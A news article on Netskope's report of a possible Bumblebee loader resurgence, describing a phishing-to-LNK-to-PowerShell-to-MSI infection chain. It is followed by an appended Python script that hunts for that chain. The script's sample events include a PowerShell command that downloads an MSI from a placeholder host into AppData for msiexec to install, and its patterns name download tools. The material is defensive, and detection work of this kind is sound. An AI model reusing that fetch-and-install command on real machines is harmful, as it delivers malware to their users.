Netskope Reports Possible Bumblebee Loader Resurgence

The Bumblebee malware loader could have re-emerged months after Europol-led Operation Endgame disrupted it in May 2024.

A new infection chain which deploys Bumblebee malware has been uncovered in a new report from Netskope Threat Labs.

This is the first occurrence of a Bumblebee campaign since Operation Endgame, a law enforcement operation performed by Europol and partners in May 2024 which disrupted major malware botnets.

The Netskope report also points to other research corroborating a possible Bumblebee return.

Background on Bumblebee

Bumblebee is a sophisticated malware loader that cybercriminal groups have actively used to distribute various types of malware, such as ransomware, infostealers, and other malicious payloads.

Google’s Threat Analysis Group (TAG) first discovered the malware in March 2022 and named it Bumblebee based on a user-agent string it used.

Bumblebee replaced other popular loaders like BazarLoader and TrickBot, which were heavily used in ransomware campaigns.

It has been linked to several ransomware groups, including Conti, Quantum, and MountLocker, all of which use it as part of their initial access strategy for deploying ransomware.

Bumblebee disappeared from the cyber threat landscape in late 2023 before re-emerging in February 2024.

Three months later, its infrastructure was taken down by Europol alongside other loaders’, including IcedID, SystemBC, Pikabot, Smokeloader and Trickbot.

Bumblebee’s New Infection Chain

The infection chain detected by Netskope likely starts with a phishing email that lures the victim into downloading a ZIP file, extracting it and executing the file inside.

The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns.

The usage of LNK files is common in Bumblebee campaigns, either to download the next stage payloads or to directly execute files. In this case, the file is used as a downloader and is responsible for downloading and executing the next stage of the infection chain.

Once opened, the LNK file executes a PowerShell command that downloads a Microsoft Installer (MSI) file from a remote server, renames it as ‘%AppData%\y.msi’ and then executes/installs it using the Microsoft msiexec.exe tool.

The use of MSI files to execute payloads is a successful technique several adversaries, such as DarkGate and Latrodectus, regularly use.

However, this is the first time it has been seen deploying Bumblebee, said Leandro Fróes, the author of the Netskope report.

In the case of this new infection, the analyzed samples are disguised as Nvidia and Midjourney installers. They are used to load and execute the final payload all in memory, without even having to drop the payload to disk, as observed in previous campaigns using ISO files.
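One way to hunt for the PowerShell-to-msiexec stage described above in process-creation telemetry, as an added example that is not from the Netskope report or this article: it flags msiexec.exe installing an MSI from a user's AppData folder and raises the severity when a PowerShell ancestor's command line shows a download into that folder. The event field names, the sample events, the regex patterns and the three-level severity scale are constructed assumptions.

```python
import re

# Assumed patterns: common PowerShell download verbs, and an .msi path under AppData.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer|downloadfile", re.I)
USER_MSI = re.compile(r"(%appdata%|\$env:appdata|\\appdata\\(roaming|local))\\[^\"'\s;]*\.msi", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}

# Constructed process-creation events (hypothetical field names), not data from the report.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmd": r'powershell.exe -c "iwr http://host.invalid/x -OutFile $env:APPDATA\y.msi"'},
    {"pid": 300, "ppid": 200, "image": "msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\bob\AppData\Roaming\y.msi"},
    {"pid": 400, "ppid": 100, "image": "msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Program Files\Vendor\setup.msi"},
    {"pid": 600, "ppid": 100, "image": "msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\tool.msi"'},
]

def ancestors(event, by_pid, max_hops=4):
    """Yield parent events up the tree; the hop bound guards against PID-reuse loops."""
    for _ in range(max_hops):
        event = by_pid.get(event["ppid"])
        if event is None:
            return
        yield event

def find_chains(events):
    """Return one finding per msiexec process that installs an MSI from AppData."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "msiexec.exe" or not USER_MSI.search(e["cmd"]):
            continue
        reasons = ["msiexec installs an MSI from AppData"]
        for parent in ancestors(e, by_pid):
            if parent["image"].lower() in SHELLS:
                reasons.append("PowerShell is an ancestor")
                if DOWNLOAD.search(parent["cmd"]) and USER_MSI.search(parent["cmd"]):
                    reasons.append("that PowerShell downloaded an MSI into AppData")
                break
        severity = ("low", "medium", "high")[len(reasons) - 1]
        findings.append({"pid": e["pid"], "severity": severity, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in find_chains(EVENTS):
        print(finding)
```

An MSI installed from AppData with no PowerShell ancestor is kept as a low-severity finding rather than dropped, since some legitimate per-user installers behave the same way and need allow-listing rather than silence.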